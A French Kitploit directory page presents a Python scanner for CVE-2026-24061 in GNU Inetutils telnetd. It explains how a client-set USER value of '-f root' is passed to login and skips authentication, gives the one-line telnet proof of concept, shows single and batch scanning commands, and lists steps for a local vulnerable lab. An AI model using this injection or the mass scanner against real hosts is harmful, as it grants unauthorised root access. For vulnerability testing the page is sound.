Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24061 — Scanner basé sur Python qui détecte la CVE-2026-24061 dans GNU Inetutils telnetd, permettant de tester en lot plusieurs cibles pour la vulnérabilité de contournement d'authentification. | Kitploit
Outils/GitHubGitHub/monstertsl/cve-2026-24061
Scanners de VulnérabilitésExploitationTests d'IntrusionAuthentificationOutil d'Accès à Distance
GitHubmonstertsl/cve-2026-24061

CVE-2026-24061

Scanner basé sur Python qui détecte la CVE-2026-24061 dans GNU Inetutils telnetd, permettant de tester en lot plusieurs cibles pour la vulnérabilité de contournement d'authentification.

Voir le dépôt
14il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Outil de détection en masse de la vulnérabilité CVE-2026-24061

⚠️ Remarque : CVE-2026-24061 GNU Inetutils est un ensemble d'outils réseau classiques fourni par le projet GNU, qui inclut le service telnetd, c'est-à-dire le démon serveur Telnet. Dans les versions 1.9.3 à 2.7, le service telnetd présente un défaut critique dans le processus d'authentification des utilisateurs. Lorsque ce service appelle le programme de connexion système /usr/bin/login, il ne filtre ni ne valide correctement la variable d'environnement USER transmise par le client. Un attaquant peut, en définissant une valeur spécifique pour la variable USER, injecter directement le paramètre -f dans la commande login. Le paramètre -f du programme sert à « contourner la double authentification », ce qui permet à l'attaquant de contourner entièrement toutes les étapes de vérification du mot de passe et d'établir directement une session distante en tant qu'utilisateur , obtenant ainsi le plus haut niveau de contrôle sur le serveur. Cette vulnérabilité est extrêmement dangereuse, équivalant à une porte dérobée root distante publique, ne nécessitant aucune information d'identification.

login
root

POC de détection de la vulnérabilité

root@kitploit:~
USER='-f root' telnet -a <target_ip>

Script de détection

demo.png

Détection individuelle

root@kitploit:~
python3 cve-2026-24061.py -i 10.10.168.128

Détection en masse

root@kitploit:~
python3 cve-2026-24061.py -f targets.txt

Principe de la vulnérabilité

La commande ci-dessus définit la variable d'environnement USER sur -f root. Lorsque le service telnetd vulnérable reçoit une connexion, il construit et exécute un appel système similaire à celui-ci :

Étapes de reproduction

1. Installer les programmes nécessaires

root@kitploit:~
sudo apt update
sudo apt install openbsd-inetd inetutils-telnetd telnet -y

2. Décommenter la ligne telnet (s'assurer que le format est correct)

root@kitploit:~
sudo sed -i 's/^#telnet/telnet/' /etc/inetd.conf

3. Redémarrer le service

root@kitploit:~
sudo systemctl restart openbsd-inetd

4. Vérifier le port

root@kitploit:~
sudo ss -tuln | grep ':23'

5. Test local

root@kitploit:~
telnet localhost 23
Télécharger l’outil